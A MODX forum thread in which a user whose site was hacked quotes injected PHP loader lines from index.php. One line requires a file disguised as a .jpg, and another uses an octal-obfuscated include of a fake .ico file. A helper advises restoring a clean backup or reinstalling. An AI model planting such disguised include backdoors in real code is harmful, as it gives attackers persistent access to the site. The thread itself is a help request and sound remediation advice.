On March 26, 2019 we launched new MODX Forums. Please join us at the new MODX Community Forums.
Subscribe: RSS
  • I have updated modx 2.6.5 and gallery 1.7.1 but index.php still inject scripts like this:
    //installbg
    $rifilename='/srv/users/serverpilot/apps/amfg/public/assets/brosur/thumb/10-Indofigur NEWs.jpg-';
    require("$rifilename");
    //installend
    
    
    
    /*35dd8*/
    
    @include "\057srv/\165sers\057serv\145rpil\157t/ap\160s/am\146g/pu\142lic/\141sset\163/com\160onen\164s/ti\156ymce\057.fb9\06523dc\056ico";
    
    /*35dd8*/

    please help to clean up
    • Upgrading MODX and Gallery won't help clean your site, since hackers almost always leave non-MODX files they can use to get back in. The best solution is to restore a backup from before the hack and then upgrade MODX and Gallery.

      If you don't have such a backup, you can either try to find and remove all the offending files, or back up your site, wipe everything, install a clean new version, and cut-and-paste your content and users into the new site.

        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting